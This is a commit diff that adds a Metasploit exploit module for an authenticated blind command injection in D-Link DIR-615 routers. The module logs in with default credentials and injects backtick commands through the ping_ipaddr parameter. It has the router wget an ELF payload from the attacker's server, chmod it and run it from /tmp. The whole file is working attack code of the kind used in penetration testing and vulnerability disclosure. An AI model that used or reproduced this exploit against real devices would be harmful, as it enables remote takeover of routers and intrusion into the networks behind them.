|
| 1 | +## |
| 2 | +# This file is part of the Metasploit Framework and may be subject to |
| 3 | +# redistribution and commercial restrictions. Please see the Metasploit |
| 4 | +# web site for more information on licensing and terms of use. |
| 5 | +# http://metasploit.com/ |
| 6 | +## |
| 7 | + |
| 8 | +require 'msf/core' |
| 9 | + |
| 10 | +class Metasploit3 < Msf::Exploit::Remote |
| 11 | + Rank = ExcellentRanking |
| 12 | + |
| 13 | + include Msf::Exploit::Remote::HttpClient |
| 14 | + include Msf::Exploit::Remote::HttpServer |
| 15 | + include Msf::Exploit::EXE |
| 16 | + include Msf::Exploit::FileDropper |
| 17 | + |
| 18 | + def initialize(info = {}) |
| 19 | + super(update_info(info, |
| 20 | + 'Name' => 'D-Link DIR615h Command Execution - Upload and Execute', |
| 21 | + 'Description' => %q{ |
| 22 | + Some D-Link Routers are vulnerable to an authenticated OS command injection. |
| 23 | + Default credentials for the web interface are admin/admin or admin/password. Since |
| 24 | + it is a blind os command injection vulnerability, there is no output for the |
| 25 | + executed command when using the cmd generic payload. This module was tested against |
| 26 | + a DIR-615 hardware revision H1 - firmware version 8.04. A ping command against a |
| 27 | + controlled system could be used for testing purposes. The exploit uses the wget |
| 28 | + client from the device to download the payload. |
| 29 | + }, |
| 30 | + 'Author' => |
| 31 | + [ |
| 32 | + 'Michael Messner <[email protected]>', # Vulnerability discovery and Metasploit module |
| 33 | + 'juan vazquez' # minor help with msf module |
| 34 | + ], |
| 35 | + 'License' => MSF_LICENSE, |
| 36 | + 'References' => |
| 37 | + [ |
| 38 | + [ 'BID', '57882' ], |
| 39 | + [ 'EDB', '24477' ], |
| 40 | + [ 'OSVDB', '90174' ], |
| 41 | + [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-008' ] |
| 42 | + ], |
| 43 | + 'DisclosureDate' => 'Feb 07 2013', |
| 44 | + 'Privileged' => true, |
| 45 | + 'Platform' => ['linux','unix'], |
| 46 | + 'Payload' => |
| 47 | + { |
| 48 | + 'DisableNops' => true |
| 49 | + }, |
| 50 | + 'Targets' => |
| 51 | + [ |
| 52 | + [ 'CMD', |
| 53 | + { |
| 54 | + 'Arch' => ARCH_CMD, |
| 55 | + 'Platform' => 'unix' |
| 56 | + } |
| 57 | + ], |
| 58 | + [ 'Linux mipsel Payload', |
| 59 | + { |
| 60 | + 'Arch' => ARCH_MIPSLE, |
| 61 | + 'Platform' => 'linux' |
| 62 | + } |
| 63 | + ], |
| 64 | + ], |
| 65 | + 'DefaultTarget' => 1, |
| 66 | + )) |
| 67 | + |
| 68 | + register_options( |
| 69 | + [ |
| 70 | + OptString.new('USERNAME', [ true, 'The username to authenticate as', 'admin' ]), |
| 71 | + OptString.new('PASSWORD', [ true, 'The password for the specified username', 'admin' ]), |
| 72 | + OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]), |
| 73 | + OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]), |
| 74 | + OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60]) |
| 75 | + ], self.class) |
| 76 | + end |
| 77 | + |
| 78 | + |
| 79 | + def request(cmd) |
| 80 | + begin |
| 81 | + res = send_request_cgi({ |
| 82 | + 'uri' => @uri, |
| 83 | + 'method' => 'GET', |
| 84 | + 'vars_get' => { |
| 85 | + "page" => "tools_vct", |
| 86 | + "hping" => "0", |
| 87 | + "ping_ipaddr" => "1.1.1.1`#{cmd}`", |
| 88 | + "ping6_ipaddr" => "" |
| 89 | + } |
| 90 | + }) |
| 91 | + return res |
| 92 | + rescue ::Rex::ConnectionError |
| 93 | + vprint_error("#{rhost}:#{rport} - Failed to connect to the web server") |
| 94 | + return nil |
| 95 | + end |
| 96 | + end |
| 97 | + |
| 98 | + def exploit |
| 99 | + downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8)) |
| 100 | + @uri = '/tools_vct.htm' |
| 101 | + user = datastore['USERNAME'] |
| 102 | + pass = datastore['PASSWORD'] |
| 103 | + @timeout = 5 |
| 104 | + |
| 105 | + # |
| 106 | + # testing Login |
| 107 | + # |
| 108 | + print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}") |
| 109 | + begin |
| 110 | + res= send_request_cgi({ |
| 111 | + 'uri' => '/login.htm', |
| 112 | + 'method' => 'POST', |
| 113 | + 'vars_post' => { |
| 114 | + "page" => "login", |
| 115 | + "submitType" => "0", |
| 116 | + "identifier" => "", |
| 117 | + "sel_userid" => user, |
| 118 | + "userid" => "", |
| 119 | + "passwd" => pass, |
| 120 | + "captchapwd" => "" |
| 121 | + } |
| 122 | + }) |
| 123 | + if res.nil? or res.code == 404 |
| 124 | + fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}") |
| 125 | + end |
| 126 | + if res.body =~ /\<script\ langauge\=\"javascript\"\>showMainTabs\(\"setup\"\)\;\<\/script\>/ |
| 127 | + print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}") |
| 128 | + else |
| 129 | + fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}") |
| 130 | + end |
| 131 | + rescue ::Rex::ConnectionError |
| 132 | + fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Failed to connect to the web server") |
| 133 | + end |
| 134 | + |
| 135 | + if target.name =~ /CMD/ |
| 136 | + if not (datastore['CMD']) |
| 137 | + fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible") |
| 138 | + end |
| 139 | + cmd = payload.encoded |
| 140 | + res = request(cmd) |
| 141 | + if (!res) |
| 142 | + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") |
| 143 | + else |
| 144 | + print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state") |
| 145 | + end |
| 146 | + return |
| 147 | + end |
| 148 | + |
| 149 | + #thx to Juan for his awesome work on the mipsel elf support |
| 150 | + @pl = generate_payload_exe |
| 151 | + @elf_sent = false |
| 152 | + |
| 153 | + # |
| 154 | + # start our server |
| 155 | + # |
| 156 | + resource_uri = '/' + downfile |
| 157 | + |
| 158 | + if (datastore['DOWNHOST']) |
| 159 | + service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri |
| 160 | + else |
| 161 | + #do not use SSL |
| 162 | + if datastore['SSL'] |
| 163 | + ssl_restore = true |
| 164 | + datastore['SSL'] = false |
| 165 | + end |
| 166 | + |
| 167 | + if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::") |
| 168 | + srv_host = Rex::Socket.source_address(rhost) |
| 169 | + else |
| 170 | + srv_host = datastore['SRVHOST'] |
| 171 | + end |
| 172 | + |
| 173 | + service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri |
| 174 | + print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...") |
| 175 | + start_service({'Uri' => { |
| 176 | + 'Proc' => Proc.new { |cli, req| |
| 177 | + on_request_uri(cli, req) |
| 178 | + }, |
| 179 | + 'Path' => resource_uri |
| 180 | + }}) |
| 181 | + |
| 182 | + datastore['SSL'] = true if ssl_restore |
| 183 | + end |
| 184 | + |
| 185 | + # |
| 186 | + # download payload |
| 187 | + # |
| 188 | + print_status("#{rhost}:#{rport} - Asking the D-Link device to download #{service_url}") |
| 189 | + #this filename is used to store the payload on the device |
| 190 | + filename = rand_text_alpha_lower(8) |
| 191 | + |
| 192 | + #not working if we send all command together -> lets take three requests |
| 193 | + cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}" |
| 194 | + res = request(cmd) |
| 195 | + if (!res) |
| 196 | + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload") |
| 197 | + end |
| 198 | + |
| 199 | + # wait for payload download |
| 200 | + if (datastore['DOWNHOST']) |
| 201 | + print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the D-Link device to download the payload") |
| 202 | + select(nil, nil, nil, datastore['HTTP_DELAY']) |
| 203 | + else |
| 204 | + wait_linux_payload |
| 205 | + end |
| 206 | + register_file_for_cleanup("/tmp/#{filename}") |
| 207 | + |
| 208 | + print_status("#{rhost}:#{rport} - Waiting #{@timeout} seconds for reloading the configuration") |
| 209 | + select(nil, nil, nil, @timeout) |
| 210 | + |
| 211 | + # |
| 212 | + # chmod |
| 213 | + # |
| 214 | + cmd = "chmod 777 /tmp/#{filename}" |
| 215 | + print_status("#{rhost}:#{rport} - Asking the D-Link device to chmod #{downfile}") |
| 216 | + res = request(cmd) |
| 217 | + if (!res) |
| 218 | + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload") |
| 219 | + end |
| 220 | + print_status("#{rhost}:#{rport} - Waiting #{@timeout} seconds for reloading the configuration") |
| 221 | + select(nil, nil, nil, @timeout) |
| 222 | + |
| 223 | + # |
| 224 | + # execute |
| 225 | + # |
| 226 | + cmd = "/tmp/#{filename}" |
| 227 | + print_status("#{rhost}:#{rport} - Asking the D-Link device to execute #{downfile}") |
| 228 | + res = request(cmd) |
| 229 | + if (!res) |
| 230 | + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload") |
| 231 | + end |
| 232 | + |
| 233 | + end |
| 234 | + |
| 235 | + # Handle incoming requests from the server |
| 236 | + def on_request_uri(cli, request) |
| 237 | + #print_status("on_request_uri called: #{request.inspect}") |
| 238 | + if (not @pl) |
| 239 | + print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!") |
| 240 | + return |
| 241 | + end |
| 242 | + print_status("#{rhost}:#{rport} - Sending the payload to the server...") |
| 243 | + @elf_sent = true |
| 244 | + send_response(cli, @pl) |
| 245 | + end |
| 246 | + |
| 247 | + # wait for the data to be sent |
| 248 | + def wait_linux_payload |
| 249 | + print_status("#{rhost}:#{rport} - Waiting for the victim to request the ELF payload...") |
| 250 | + |
| 251 | + waited = 0 |
| 252 | + while (not @elf_sent) |
| 253 | + select(nil, nil, nil, 1) |
| 254 | + waited += 1 |
| 255 | + if (waited > datastore['HTTP_DELAY']) |
| 256 | + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?") |
| 257 | + end |
| 258 | + end |
| 259 | + end |
| 260 | + |
| 261 | +end |
0 commit comments